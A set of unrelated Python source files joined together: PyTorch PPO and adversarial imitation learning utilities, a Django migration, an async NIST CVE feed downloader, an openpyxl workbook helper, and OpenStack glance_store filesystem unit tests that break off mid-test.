pos_pool.insert(0, pos_pool.pop(pos_pool.index(resp)))
else:
pos_pool = [resp]
neg_pool = context_response_data[i]["neg_pool"]
response = pos_pool + neg_pool
response_data.append(response[:ranking_length])
return response_data
|
import torch
from torch import autograd
from torch.nn import functional as F
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader, Dataset
# Dataset that returns transition tuples of the form (s, a, r, s', terminal)
class TransitionDataset(Dataset):
def __init__(self, transitions):
super().__init__()
self.states, self.actions, self.rewards, self.terminals = transitions['states'], transitions['actions'].detach(), transitions['rewards'], transitions['terminals'] # Detach actions
# Allows string-based access for entire data of one type, or int-based access for single transition
def __getitem__(self, idx):
if isinstance(idx, str):
if idx == 'states':
return self.states
elif idx == 'actions':
return self.actions
else:
return dict(states=self.states[idx], actions=self.actions[idx], rewards=self.rewards[idx], next_states=self.states[idx + 1], terminals=self.terminals[idx])
def __len__(self):
return self.terminals.size(0) - 1 # Need to return state and next state
# Computes and stores generalised advantage estimates ψ in the set of trajectories
def compute_advantages(trajectories, next_value, discount, trace_decay):
with torch.no_grad(): # Do not differentiate through advantage calculation
reward_to_go, advantage = torch.tensor([0.]), torch.tensor([0.])
trajectories['rewards_to_go'], trajectories['advantages'] = torch.empty_like(trajectories['rewards']), torch.empty_like(trajectories['rewards'])
for t in reversed(range(trajectories['states'].size(0))):
reward_to_go = trajectories['rewards'][t] + (1 - trajectories['terminals'][t]) * (discount * reward_to_go) # Reward-to-go/value R
trajectories['rewards_to_go'][t] = reward_to_go
td_error = trajectories['rewards'][t] + (1 - trajectories['terminals'][t]) * discount * next_value - trajectories['values'][t] # TD-error δ
advantage = td_error + (1 - trajectories['terminals'][t]) * discount * trace_decay * advantage # Generalised advantage estimate ψ
trajectories['advantages'][t] = advantage
next_value = trajectories['values'][t]
# Performs one PPO update (assumes trajectories for first epoch are attached to agent)
def ppo_update(agent, trajectories, agent_optimiser, ppo_clip, epoch, value_loss_coeff=1, entropy_reg_coeff=1):
# Recalculate outputs for subsequent iterations
if epoch > 0:
policy, trajectories['values'] = agent(trajectories['states'])
trajectories['log_prob_actions'], trajectories['entropies'] = policy.log_prob(trajectories['actions'].detach()), policy.entropy()
policy_ratio = (trajectories['log_prob_actions'] - trajectories['old_log_prob_actions']).exp()
policy_loss = -torch.min(policy_ratio * trajectories['advantages'], torch.clamp(policy_ratio, min=1 - ppo_clip, max=1 + ppo_clip) * trajectories['advantages']).mean() # Update the policy by maximising the clipped PPO objective
value_loss = F.mse_loss(trajectories['values'], trajectories['rewards_to_go']) # Fit value function by regression on mean squared error
entropy_reg = -trajectories['entropies'].mean() # Add entropy regularisation
agent_optimiser.zero_grad()
(policy_loss + value_loss_coeff * value_loss + entropy_reg_coeff * entropy_reg).backward()
clip_grad_norm_(agent.parameters(), 1) # Clamp norm of gradients
agent_optimiser.step()
# Performs a behavioural cloning update
def behavioural_cloning_update(agent, expert_trajectories, agent_optimiser, batch_size):
expert_dataloader = DataLoader(expert_trajectories, batch_size=batch_size, shuffle=True, drop_last=True)
for expert_transition in expert_dataloader:
expert_state, expert_action = expert_transition['states'], expert_transition['actions']
agent_optimiser.zero_grad()
behavioural_cloning_loss = -agent.log_prob(expert_state, expert_action).mean() # Maximum likelihood objective
behavioural_cloning_loss.backward()
agent_optimiser.step()
# Performs a target estimation update
def target_estimation_update(discriminator, expert_trajectories, discriminator_optimiser, batch_size):
expert_dataloader = DataLoader(expert_trajectories, batch_size=batch_size, shuffle=True, drop_last=True)
for expert_transition in expert_dataloader:
expert_state, expert_action = expert_transition['states'], expert_transition['actions']
discriminator_optimiser.zero_grad()
prediction, target = discriminator(expert_state, expert_action)
regression_loss = F.mse_loss(prediction, target)
regression_loss.backward()
discriminator_optimiser.step()
# Performs an adversarial imitation learning update
def adversarial_imitation_update(algorithm, agent, discriminator, expert_trajectories, policy_trajectories, discriminator_optimiser, batch_size, r1_reg_coeff=1):
expert_dataloader = DataLoader(expert_trajectories, batch_size=batch_size, shuffle=True, drop_last=True)
policy_dataloader = DataLoader(policy_trajectories, batch_size=batch_size, shuffle=True, drop_last=True)
# Iterate over mininum of expert and policy data
for expert_transition, policy_transition in zip(expert_dataloader, policy_dataloader):
expert_state, expert_action, expert_next_state, expert_terminal = expert_transition['states'], expert_transition['actions'], expert_transition['next_states'], expert_transition['terminals']
policy_state, policy_action, policy_next_state, policy_terminal = policy_transition['states'], policy_transition['actions'], policy_transition['next_states'], policy_transition['terminals']
if algorithm == 'GAIL':
D_expert = discriminator(expert_state, expert_action)
D_policy = discriminator(policy_state, policy_action)
elif algorithm == 'AIRL':
with torch.no_grad():
expert_data_policy = agent.log_prob(expert_state, expert_action).exp()
policy_data_policy = agent.log_prob(policy_state, policy_action).exp()
D_expert = discriminator(expert_state, expert_action, expert_next_state, expert_data_policy, expert_terminal)
D_policy = discriminator(policy_state, expert_action, policy_next_state, policy_data_policy, policy_terminal)
# Binary logistic regression
discriminator_optimiser.zero_grad()
expert_loss = F.binary_cross_entropy(D_expert, torch.ones_like(D_expert)) # Loss on "real" (expert) data
autograd.backward(expert_loss, create_graph=True)
r1_reg = 0
for param in discriminator.parameters():
r1_reg += param.grad.norm().mean() # R1 gradient penalty
policy_loss = F.binary_cross_entropy(D_policy, torch.zeros_like(D_policy)) # Loss on "fake" (policy) data
(policy_loss + r1_reg_coeff * r1_reg).backward()
discriminator_optimiser.step()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Inventory', '0017_auto_20151227_1321'),
]
operations = [
migrations.AddField(
model_name='orderhistorymodel',
name='DocumentStatus',
field=models.CharField(default='pagado', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='orderhistorymodel',
name='Type',
field=models.CharField(default='po', max_length=20, choices=[(b'PO', b'Orden de compra'), (b'SO', b'Orden de venta')]),
preserve_default=False,
),
]
|
"""NIST CVE data downloader."""
import asyncio
import logging
from concurrent import futures
from datetime import datetime
from functools import cached_property
from typing import AsyncIterator, Optional, Set, Type
import aiohttp
import abstracts
from aio.core import event
from aio.core.functional import async_property, QueryDict
from aio.core.tasks import concurrent
from aio.api.nist import abstract, typing
logger = logging.getLogger(__name__)
NIST_URL_TPL = (
"https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-{year}.json.gz")
SCAN_FROM_YEAR = 2018
@abstracts.implementer(event.IExecutive)
class ANISTDownloader(event.AExecutive, metaclass=abstracts.Abstraction):
def __init__(
self,
tracked_cpes: "typing.TrackedCPEDict",
cve_fields: Optional[QueryDict] = None,
ignored_cves: Optional[Set] = None,
since: Optional[int] = None,
loop: Optional[asyncio.AbstractEventLoop] = None,
pool: Optional[futures.Executor] = None,
session: Optional[aiohttp.ClientSession] = None) -> None:
self._since = since
self.cve_fields = cve_fields
self.ignored_cves = ignored_cves
self.tracked_cpes = tracked_cpes
self._session = session
self._loop = loop
self._pool = pool
async def __aiter__(self) -> AsyncIterator[str]:
async for url in self.downloads:
yield url
@cached_property
def cpe_revmap(self) -> "typing.CPERevmapDict":
"""Collected reverse mapping of CPEs."""
return {}
@cached_property
def cves(self) -> "typing.CVEDict":
"""Collected CVEs."""
return {}
@property
def downloaders(self) -> "typing.DownloadGenerator":
"""Download co-routines for NIST data."""
for url in self.urls:
yield self.download_and_parse(url)
@async_property
async def downloads(self) -> AsyncIterator[str]:
"""CVE data derived from parsing NIST CVE data."""
async for download in concurrent(self.downloaders):
yield download.url
@property
def nist_url_tpl(self) -> str:
"""Default URL template string for NIST downloads."""
return NIST_URL_TPL
@cached_property
def parser(self) -> "abstract.ANISTParser":
"""NIST CVE parser, to be run in processor pool."""
return self.parser_class(
self.tracked_cpes,
cve_fields=self.cve_fields,
ignored_cves=self.ignored_cves)
@property # type:ignore
@abstracts.interfacemethod
def parser_class(self) -> Type["abstract.ANISTParser"]:
"""NIST parser class."""
raise NotImplementedError
@property
def scan_year_end(self) -> int:
"""Inclusive end year to scan to."""
return datetime.now().year + 1
@cached_property
def session(self) -> aiohttp.ClientSession:
"""HTTP client session."""
return self._session or aiohttp.ClientSession()
@property
def since(self) -> int:
return max(
self._since or SCAN_FROM_YEAR,
SCAN_FROM_YEAR)
@property
def urls(self) -> Set[str]:
"""URLs to fetch NIST data from."""
return set(
self.nist_url_tpl.format(year=year)
for year
in self.years)
@property
def years(self) -> range:
"""Range of years to scan."""
return range(
self.since,
self.scan_year_end)
def add(
self,
cves: "typing.CVEDict",
cpe_revmap: "typing.CPERevmapDict") -> None:
"""Capture incoming CVE data."""
self.cves.update(cves)
self.cpe_revmap.update(cpe_revmap)
async def download_and_parse(self, url: str) -> aiohttp.ClientResponse:
"""Async download and parsing of CVE data."""
download = await self.session.get(url)
logger.debug(f"Downloading CVE data: {url}")
self.add(*await self.parse(url, await download.read()))
logger.debug(f"CVE data saved: {url}")
return download
async def parse(self, url: str, data: bytes) -> "typing.CVEDataTuple":
"""Parse incoming data in executor."""
# Disable this comment to prevent running the parser in a separate
# process - useful for debugging.
# return self.parser(data)
logger.debug(f"Parsing CVE data: {url}")
return await self.execute(
self.parser,
data)
|
from openpyxl import Workbook
from openpyxl.utils import get_column_letter
from openpyxl.styles import Font, PatternFill, colors
from openpyxl.utils.dataframe import dataframe_to_rows
def create_workbook_from_dataframe(df):
"""
1. Create workbook from specified pandas.DataFrame
2. Adjust columns width to fit the text inside
3. Make the index column and the header row bold
4. Fill background color for the header row
Other beautification MUST be done by usage side.
"""
workbook = Workbook()
ws = workbook.active
rows = dataframe_to_rows(df.reset_index(), index=False)
col_widths = [0] * (len(df.columns) + 1)
for i, row in enumerate(rows, 1):
for j, val in enumerate(row, 1):
if type(val) is str:
cell = ws.cell(row=i, column=j, value=val)
col_widths[j - 1] = max([col_widths[j - 1], len(str(val))])
elif hasattr(val, "sort"):
cell = ws.cell(row=i, column=j, value=", ".join(list(map(lambda v: str(v), list(val)))))
col_widths[j - 1] = max([col_widths[j - 1], len(str(val))])
else:
cell = ws.cell(row=i, column=j, value=val)
col_widths[j - 1] = max([col_widths[j - 1], len(str(val)) + 1])
# Make the index column and the header row bold
if i == 1 or j == 1:
cell.font = Font(bold=True)
# Fill background color for the header row
if i == 1:
cell.fill = PatternFill('solid', fgColor=colors.YELLOW)
# Adjust column width
for i, w in enumerate(col_widths):
letter = get_column_letter(i + 1)
ws.column_dimensions[letter].width = w
return workbook
def fill_cell_color(cell, color, fill_type='solid'):
cell.fill = PatternFill(fill_type, fgColor=('00' + color))
def fill_text_color(cell, color, bold=False):
cell.font = Font(color=color, bold=bold)
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests the filesystem backend store"""
import errno
import hashlib
import json
import os
import stat
from unittest import mock
import uuid
import fixtures
from oslo_utils.secretutils import md5
from oslo_utils import units
import six
from six.moves import builtins
# NOTE(jokke): simplified transition to py3, behaves like py2 xrange
from six.moves import range
from glance_store._drivers import filesystem
from glance_store import exceptions
from glance_store import location
from glance_store.tests import base
from glance_store.tests.unit import test_store_capabilities
class TestStore(base.StoreBaseTest,
test_store_capabilities.TestStoreCapabilitiesChecking):
def setUp(self):
"""Establish a clean test environment."""
super(TestStore, self).setUp()
self.store = filesystem.Store(self.conf)
self.config(filesystem_store_datadir=self.test_dir,
filesystem_store_chunk_size=10,
stores=['glance.store.filesystem.Store'],
group="glance_store")
self.store.configure()
self.register_store_schemes(self.store, 'file')
self.hash_algo = 'sha256'
def _create_metadata_json_file(self, metadata):
expected_image_id = str(uuid.uuid4())
jsonfilename = os.path.join(self.test_dir,
"storage_metadata.%s" % expected_image_id)
self.config(filesystem_store_metadata_file=jsonfilename,
group="glance_store")
with open(jsonfilename, 'w') as fptr:
json.dump(metadata, fptr)
def _store_image(self, in_metadata):
expected_image_id = str(uuid.uuid4())
expected_file_size = 10
expected_file_contents = b"*" * expected_file_size
image_file = six.BytesIO(expected_file_contents)
self.store.FILESYSTEM_STORE_METADATA = in_metadata
return self.store.add(expected_image_id, image_file,
expected_file_size, self.hash_algo)
def test_get(self):
"""Test a "normal" retrieval of an image in chunks."""
# First add an image...
image_id = str(uuid.uuid4())
file_contents = b"chunk00000remainder"
image_file = six.BytesIO(file_contents)
loc, size, checksum, multihash, _ = self.store.add(
image_id, image_file, len(file_contents), self.hash_algo)
# Now read it back...
uri = "file:///%s/%s" % (self.test_dir, image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
(image_file, image_size) = self.store.get(loc)
expected_data = b"chunk00000remainder"
expected_num_chunks = 2
data = b""
num_chunks = 0
for chunk in image_file:
num_chunks += 1
data += chunk
self.assertEqual(expected_data, data)
self.assertEqual(expected_num_chunks, num_chunks)
def test_get_random_access(self):
"""Test a "normal" retrieval of an image in chunks."""
# First add an image...
image_id = str(uuid.uuid4())
file_contents = b"chunk00000remainder"
image_file = six.BytesIO(file_contents)
loc, size, checksum, multihash, _ = self.store.add(
image_id, image_file, len(file_contents), self.hash_algo)
# Now read it back...
uri = "file:///%s/%s" % (self.test_dir, image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
data = b""
for offset in range(len(file_contents)):
(image_file, image_size) = self.store.get(loc,
offset=offset,
chunk_size=1)
for chunk in image_file:
data += chunk
self.assertEqual(file_contents, data)
data = b""
chunk_size = 5
(image_file, image_size) = self.store.get(loc,
offset=chunk_size,
chunk_size=chunk_size)
for chunk in image_file:
data += chunk
self.assertEqual(b'00000', data)
self.assertEqual(chunk_size, image_size)
def test_get_non_existing(self):
"""
Test that trying to retrieve a file that doesn't exist
raises an error
"""
loc = location.get_location_from_uri(
"file:///%s/non-existing" % self.test_dir, conf=self.conf)
self.assertRaises(exceptions.NotFound,
self.store.get,
loc)
def _do_test_add(self, enable_thin_provisoning):
"""Test that we can add an image via the filesystem backend."""
self.config(filesystem_store_chunk_size=units.Ki,
filesystem_thin_provisioning=enable_thin_provisoning,
group='glance_store')
self.store.configure()
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (self.test_dir,
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
loc, size, checksum, multihash, _ = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, loc)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
self.assertEqual(expected_multihash, multihash)
uri = "file:///%s/%s" % (self.test_dir, expected_image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
(new_image_file, new_image_size) = self.store.get(loc)
new_image_contents = b""
new_image_file_size = 0
for chunk in new_image_file:
new_image_file_size += len(chunk)
new_image_contents += chunk
self.assertEqual(expected_file_contents, new_image_contents)
self.assertEqual(expected_file_size, new_image_file_size)
def test_thin_provisioning_is_disabled_by_default(self):
self.assertEqual(self.store.thin_provisioning, False)
def test_add_with_thick_provisioning(self):
self._do_test_add(enable_thin_provisoning=False)
def test_add_with_thin_provisioning(self):
self._do_test_add(enable_thin_provisoning=True)
def test_add_thick_provisioning_with_holes_in_file(self):
"""
Tests that a file which contains null bytes chunks is fully
written with a thick provisioning configuration.
"""
chunk_size = units.Ki # 1K
content = b"*" * chunk_size + b"\x00" * chunk_size + b"*" * chunk_size
self._do_test_thin_provisioning(content, 3 * chunk_size, 0, 3, False)
def test_add_thin_provisioning_with_holes_in_file(self):
"""
Tests that a file which contains null bytes chunks is sparsified
with a thin provisioning configuration.
"""
chunk_size = units.Ki # 1K
content = b"*" * chunk_size + b"\x00" * chunk_size + b"*" * chunk_size
self._do_test_thin_provisioning(content, 3 * chunk_size, 1, 2, True)
def test_add_thick_provisioning_without_holes_in_file(self):
"""
Tests that a file which not contain null bytes chunks is fully
written with a thick provisioning configuration.
"""
chunk_size = units.Ki # 1K
content = b"*" * 3 * chunk_size
self._do_test_thin_provisioning(content, 3 * chunk_size, 0, 3, False)
def test_add_thin_provisioning_without_holes_in_file(self):
"""
Tests that a file which not contain null bytes chunks is fully
written with a thin provisioning configuration.
"""
chunk_size = units.Ki # 1K
content = b"*" * 3 * chunk_size
self._do_test_thin_provisioning(content, 3 * chunk_size, 0, 3, True)
def test_add_thick_provisioning_with_partial_holes_in_file(self):
"""
Tests that a file which contains null bytes not aligned with
chunk size is fully written with a thick provisioning configuration.
"""
chunk_size = units.Ki # 1K
my_chunk = int(chunk_size * 1.5)
content = b"*" * my_chunk + b"\x00" * my_chunk + b"*" * my_chunk
self._do_test_thin_provisioning(content, 3 * my_chunk, 0, 5, False)
def test_add_thin_provisioning_with_partial_holes_in_file(self):
"""
Tests that a file which contains null bytes not aligned with
chunk size is sparsified with a thin provisioning configuration.
"""
chunk_size = units.Ki # 1K
my_chunk = int(chunk_size * 1.5)
content = b"*" * my_chunk + b"\x00" * my_chunk + b"*" * my_chunk
self._do_test_thin_provisioning(content, 3 * my_chunk, 1, 4, True)
def _do_test_thin_provisioning(self, content, size, truncate, write, thin):
self.config(filesystem_store_chunk_size=units.Ki,
filesystem_thin_provisioning=thin,
group='glance_store')
self.store.configure()
image_file = six.BytesIO(content)
image_id = str(uuid.uuid4())
with mock.patch.object(builtins, 'open') as popen:
self.store.add(image_id, image_file, size, self.hash_algo)
write_count = popen.return_value.__enter__().write.call_count
truncate_count = popen.return_value.__enter__().truncate.call_count
self.assertEqual(write_count, write)
self.assertEqual(truncate_count, truncate)
def test_add_with_verifier(self):
"""Test that 'verifier.update' is called when verifier is provided."""
verifier = mock.MagicMock(name='mock_verifier')
self.config(filesystem_store_chunk_size=units.Ki,
group='glance_store')
self.store.configure()
image_id = str(uuid.uuid4())
file_size = units.Ki # 1K
file_contents = b"*" * file_size
image_file = six.BytesIO(file_contents)
self.store.add(image_id, image_file, file_size, self.hash_algo,
verifier=verifier)
verifier.update.assert_called_with(file_contents)
def test_add_check_metadata_with_invalid_mountpoint_location(self):
in_metadata = [{'id': 'abcdefg',
'mountpoint': '/xyz/images'}]
location, size, checksum, multihash, metadata = self._store_image(
in_metadata)
self.assertEqual({}, metadata)
def test_add_check_metadata_list_with_invalid_mountpoint_locations(self):
in_metadata = [{'id': 'abcdefg', 'mountpoint': '/xyz/images'},
{'id': 'xyz1234', 'mountpoint': '/pqr/images'}]
location, size, checksum, multihash, metadata = self._store_image(
in_metadata)
self.assertEqual({}, metadata)
def test_add_check_metadata_list_with_valid_mountpoint_locations(self):
in_metadata = [{'id': 'abcdefg', 'mountpoint': '/tmp'},
{'id': 'xyz1234', 'mountpoint': '/xyz'}]
location, size, checksum, multihash, metadata = self._store_image(
in_metadata)
self.assertEqual(in_metadata[0], metadata)
def test_add_check_metadata_bad_nosuch_file(self):
expected_image_id = str(uuid.uuid4())
jsonfilename = os.path.join(self.test_dir,
"storage_metadata.%s" % expected_image_id)
self.config(filesystem_store_metadata_file=jsonfilename,
group="glance_store")
expected_file_size = 10
expected_file_contents = b"*" * expected_file_size
image_file = six.BytesIO(expected_file_contents)
location, size, checksum, multihash, metadata = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(metadata, {})
def test_add_already_existing(self):
"""
Tests that adding an image with an existing identifier
raises an appropriate exception
"""
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
image_file = six.BytesIO(file_contents)
location, size, checksum, multihash, _ = self.store.add(
image_id, image_file, file_size, self.hash_algo)
image_file = six.BytesIO(b"nevergonnamakeit")
self.assertRaises(exceptions.Duplicate,
self.store.add,
image_id, image_file, 0, self.hash_algo)
def _do_test_add_write_failure(self, errno, exception):
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
path = os.path.join(self.test_dir, image_id)
image_file = six.BytesIO(file_contents)
with mock.patch.object(builtins, 'open') as popen:
e = IOError()
e.errno = errno
popen.side_effect = e
self.assertRaises(exception,
self.store.add,
image_id, image_file, 0, self.hash_algo)
self.assertFalse(os.path.exists(path))
def test_add_storage_full(self):
"""
Tests that adding an image without enough space on disk
raises an appropriate exception
"""
self._do_test_add_write_failure(errno.ENOSPC, exceptions.StorageFull)
def test_add_file_too_big(self):
"""
Tests that adding an excessively large image file
raises an appropriate exception
"""
self._do_test_add_write_failure(errno.EFBIG, exceptions.StorageFull)
def test_add_storage_write_denied(self):
"""
Tests that adding an image with insufficient filestore permissions
raises an appropriate exception
"""
self._do_test_add_write_failure(errno.EACCES,
exceptions.StorageWriteDenied)
def test_add_other_failure(self):
"""
Tests that a non-space-related IOError does not raise a
StorageFull exceptions.
"""
self._do_test_add_write_failure(errno.ENOTDIR, IOError)
def test_add_cleanup_on_read_failure(self):
"""
Tests the partial image file is cleaned up after a read
failure.
"""
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
path = os.path.join(self.test_dir, image_id)
image_file = six.BytesIO(file_contents)
def fake_Error(size):
raise AttributeError()
with mock.patch.object(image_file, 'read') as mock_read:
mock_read.side_effect = fake_Error
self.assertRaises(AttributeError,
self.store.add,
image_id, image_file, 0, self.hash_algo)
self.assertFalse(os.path.exists(path))
def test_delete(self):
"""
Test we can delete an existing image in the filesystem store
"""
# First add an image
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
image_file = six.BytesIO(file_contents)
loc, size, checksum, multihash, _ = self.store.add(
image_id, image_file, file_size, self.hash_algo)
# Now check that we can delete it
uri = "file:///%s/%s" % (self.test_dir, image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
self.store.delete(loc)
self.assertRaises(exceptions.NotFound, self.store.get, loc)
def test_delete_non_existing(self):
"""
Test that trying to delete a file that doesn't exist
raises an error
"""
loc = location.get_location_from_uri(
"file:///tmp/glance-tests/non-existing", conf=self.conf)
self.assertRaises(exceptions.NotFound,
self.store.delete,
loc)
def test_delete_forbidden(self):
"""
Tests that trying to delete a file without permissions
raises the correct error
"""
# First add an image
image_id = str(uuid.uuid4())
file_size = 5 * units.Ki # 5K
file_contents = b"*" * file_size
image_file = six.BytesIO(file_contents)
loc, size, checksum, multihash, _ = self.store.add(
image_id, image_file, file_size, self.hash_algo)
uri = "file:///%s/%s" % (self.test_dir, image_id)
loc = location.get_location_from_uri(uri, conf=self.conf)
# Mock unlink to raise an OSError for lack of permissions
# and make sure we can't delete the image
with mock.patch.object(os, 'unlink') as unlink:
e = OSError()
e.errno = errno
unlink.side_effect = e
self.assertRaises(exceptions.Forbidden,
self.store.delete,
loc)
# Make sure the image didn't get deleted
self.store.get(loc)
def test_configure_add_with_multi_datadirs(self):
"""
Tests multiple filesystem specified by filesystem_store_datadirs
are parsed correctly.
"""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.set_override('filesystem_store_datadir',
override=None,
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200"],
group='glance_store')
self.store.configure_add()
expected_priority_map = {100: [store_map[0]], 200: [store_map[1]]}
expected_priority_list = [200, 100]
self.assertEqual(expected_priority_map, self.store.priority_data_map)
self.assertEqual(expected_priority_list, self.store.priority_list)
def test_configure_add_with_metadata_file_success(self):
metadata = {'id': 'asdf1234',
'mountpoint': '/tmp'}
self._create_metadata_json_file(metadata)
self.store.configure_add()
self.assertEqual([metadata], self.store.FILESYSTEM_STORE_METADATA)
def test_configure_add_check_metadata_list_of_dicts_success(self):
metadata = [{'id': 'abcdefg', 'mountpoint': '/xyz/images'},
{'id': 'xyz1234', 'mountpoint': '/tmp/'}]
self._create_metadata_json_file(metadata)
self.store.configure_add()
self.assertEqual(metadata, self.store.FILESYSTEM_STORE_METADATA)
def test_configure_add_check_metadata_success_list_val_for_some_key(self):
metadata = {'akey': ['value1', 'value2'], 'id': 'asdf1234',
'mountpoint': '/tmp'}
self._create_metadata_json_file(metadata)
self.store.configure_add()
self.assertEqual([metadata], self.store.FILESYSTEM_STORE_METADATA)
def test_configure_add_check_metadata_bad_data(self):
metadata = {'akey': 10, 'id': 'asdf1234',
'mountpoint': '/tmp'} # only unicode is allowed
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_check_metadata_with_no_id_or_mountpoint(self):
metadata = {'mountpoint': '/tmp'}
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
metadata = {'id': 'asdfg1234'}
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_check_metadata_id_or_mountpoint_is_not_string(self):
metadata = {'id': 10, 'mountpoint': '/tmp'}
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
metadata = {'id': 'asdf1234', 'mountpoint': 12345}
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_check_metadata_list_with_no_id_or_mountpoint(self):
metadata = [{'id': 'abcdefg', 'mountpoint': '/xyz/images'},
{'mountpoint': '/pqr/images'}]
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
metadata = [{'id': 'abcdefg'},
{'id': 'xyz1234', 'mountpoint': '/pqr/images'}]
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_add_check_metadata_list_id_or_mountpoint_is_not_string(self):
metadata = [{'id': 'abcdefg', 'mountpoint': '/xyz/images'},
{'id': 1234, 'mountpoint': '/pqr/images'}]
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
metadata = [{'id': 'abcdefg', 'mountpoint': 1234},
{'id': 'xyz1234', 'mountpoint': '/pqr/images'}]
self._create_metadata_json_file(metadata)
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_same_dir_multiple_times(self):
"""
Tests BadStoreConfiguration exception is raised if same directory
is specified multiple times in filesystem_store_datadirs.
"""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.clear_override('filesystem_store_datadir',
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200",
store_map[0] + ":300"],
group='glance_store')
self.assertRaises(exceptions.BadStoreConfiguration,
self.store.configure_add)
def test_configure_add_same_dir_multiple_times_same_priority(self):
"""
Tests BadStoreConfiguration exception is raised if same directory
is specified multiple times in filesystem_store_datadirs.
"""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.set_override('filesystem_store_datadir',
override=None,
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200",
store_map[0] + ":100"],
group='glance_store')
try:
self.store.configure()
except exceptions.BadStoreConfiguration:
self.fail("configure() raised BadStoreConfiguration unexpectedly!")
# Test that we can add an image via the filesystem backend
filesystem.ChunkedFile.CHUNKSIZE = 1024
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (store_map[1],
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
loc, size, checksum, multihash, _ = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, loc)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
self.assertEqual(expected_multihash, multihash)
loc = location.get_location_from_uri(expected_location,
conf=self.conf)
(new_image_file, new_image_size) = self.store.get(loc)
new_image_contents = b""
new_image_file_size = 0
for chunk in new_image_file:
new_image_file_size += len(chunk)
new_image_contents += chunk
self.assertEqual(expected_file_contents, new_image_contents)
self.assertEqual(expected_file_size, new_image_file_size)
def test_add_with_multiple_dirs(self):
"""Test adding multiple filesystem directories."""
store_map = [self.useFixture(fixtures.TempDir()).path,
self.useFixture(fixtures.TempDir()).path]
self.conf.set_override('filesystem_store_datadir',
override=None,
group='glance_store')
self.conf.set_override('filesystem_store_datadirs',
[store_map[0] + ":100",
store_map[1] + ":200"],
group='glance_store')
self.store.configure()
# Test that we can add an image via the filesystem backend
filesystem.ChunkedFile.CHUNKSIZE = units.Ki
expected_image_id = str(uuid.uuid4())
expected_file_size = 5 * units.Ki # 5K
expected_file_contents = b"*" * expected_file_size
expected_checksum = md5(expected_file_contents,
usedforsecurity=False).hexdigest()
expected_multihash = hashlib.sha256(expected_file_contents).hexdigest()
expected_location = "file://%s/%s" % (store_map[1],
expected_image_id)
image_file = six.BytesIO(expected_file_contents)
loc, size, checksum, multihash, _ = self.store.add(
expected_image_id, image_file, expected_file_size, self.hash_algo)
self.assertEqual(expected_location, loc)
self.assertEqual(expected_file_size, size)
self.assertEqual(expected_checksum, checksum)
